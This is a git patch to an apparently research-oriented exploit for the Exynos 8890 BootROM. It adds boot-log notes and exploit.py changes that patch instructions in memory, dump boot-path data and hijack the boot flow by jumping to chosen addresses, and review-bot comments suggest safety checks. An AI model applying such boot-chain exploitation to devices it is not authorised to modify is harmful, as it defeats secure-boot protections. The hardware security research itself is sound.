From 72a50cd648f7428932ca68e795bd0fc0e180c19e Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Sat, 7 Dec 2024 20:58:35 +0100
Subject: [PATCH] docs update and boot flow update
---
 .../source/BootROM_8890/05_notes.rst | 15 ++++++++++++++
 source/exploit/exploit.py | 20 ++++++++++++++++++-
 2 files changed, 34 insertions(+), 1 deletion(-)
diff --git a/documentation/source/BootROM_8890/05_notes.rst b/documentation/source/BootROM_8890/05_notes.rst
index a76e455..bc59655 100644
--- a/documentation/source/BootROM_8890/05_notes.rst
+++ b/documentation/source/BootROM_8890/05_notes.rst
@@ -291,4 +291,19 @@ If jumping into the boot BL33 function twice, the LDFW returns -. at the second [ERROR] Fail to load Secure payload => Return value : -.
+When continuing the boot flow by jumping into cf0052f8 after recovery boot
+.. code:: bash
+
+ U-Boot 2012.07-gc7c41ec14-dirty (Oct 23 2019 - 12:53:04) for SADK8890
+
+ CPU: Exynos8890 Rev2.0 [Samsung SOC on SMP Platform Base on ARM CortexA53]
+ MNGS_PLL = 1975MHz APOLLO_PLL = 1481MHz MIF_PLL = 1539MHz
+ BUS0_PLL = 1056MHz BUS1_PLL = 800MHz BUS2_PLL = 672MHz BUS3_PLL = 1872MHz
+ MFC_PLL = 71MHz AUD_PLL = 494MHz G3D_PLL = 650MHz DISP_PLL = 63MHz
+
+ Board: SADK8890
+ DRAM: 6 GiB
+ ECT: PARA006o
+
+I dumped the contents of 0xcf4dfb28 to 60, which is a boot path information setter. Something in BL33 is setting this, because it is still empty (0xFF) after booting into BL2 and waiting for BL33.
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 79809d3..495cc0e 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -793,6 +793,10 @@ class ExynosDevice():
 #if args.MIB3:
 # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+ if args.MIB3:
+ self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
+ self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
+
 self.cd.restore_stack_and_jump(hijacked_fun) # Jumps to function that waits for next boot stage
 # ==== Stage 4 BL2 ====
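Review bot: The two `memwrite_region` calls in the new `if args.MIB3:` branch patch code at 0x020553e4 and 0x020553f8 with a bare byte string and nothing records which instructions are being replaced or why; `1f 50 00 71` is little-endian 0x7100501f, which decodes as the AArch64 instruction `cmp w0, #0x14`, so a comment along the lines of `# MIB3: overwrite the two <original instructions> with cmp w0, #0x14 (0x7100501f) so that <intended effect on the check>` would spare the next reader a disassembly. The patch is also applied blind: nothing reads the four bytes at either address first, so on a device or firmware revision where those offsets hold something else the write patches whatever happens to be there; reading the words back and aborting if they are not the expected original bytes would make the hack safe to run against an unknown target. The return value of `memwrite_region` is discarded, so if it can report a failed write that should be checked before `restore_stack_and_jump(hijacked_fun)` hands control back to the boot stage. The enclosing method begins and ends outside the hunk.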
@@ -844,6 +848,10 @@ class ExynosDevice():
 # Modifying return values to continue boot flow
 #self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
+ # Print boot info from cf4dfb28
+ print(self.cd.memdump_region(0xcf4dfb28, 0x32))
+
+ # Start boot from BL33
 self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
 self.cd.restore_stack_and_jump(BL33_AUTH)
@@ -852,7 +860,17 @@ class ExynosDevice():
 self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
- self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)th
+ self.cd.arch_dbg.state.X0 = 0x0
+ self.cd.restore_stack_and_jump(0xcf05dd00)
+ self.connect_device()
+ self.usb_read(0x200)
+
+ # Print something over uart
+ self.write_uart(DEBUGGER_ADDR, 0xcf4dfb58)
+
+ # Try to continue the bootflow
+ self.cd.restore_stack_and_jump(0xcf0052f8)
+
 # NOT WORKING self.read_ufs(DEBUGGER_ADDR)
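Review bot: `print(self.cd.memdump_region(0xcf4dfb28, 0x32))` reads 0x32 bytes, i.e. up to 0xcf4dfb59, while the documentation added in the same commit says the region was dumped "to 60"; if that means 0xcf4dfb60 the length should be 0x38, and either way the comment should say what is being dumped rather than only where, e.g. `# Dump the boot-path info block at 0xcf4dfb28 (reads as 0xFF until BL33 writes it), 0x32 bytes`. Printing the raw return value will give a `b'...'` repr if `memdump_region` returns bytes (its return type is not visible here); `.hex()` or a short hexdump would make the all-0xFF / populated check easy to read off the console. The enclosing method begins and ends outside the hunk.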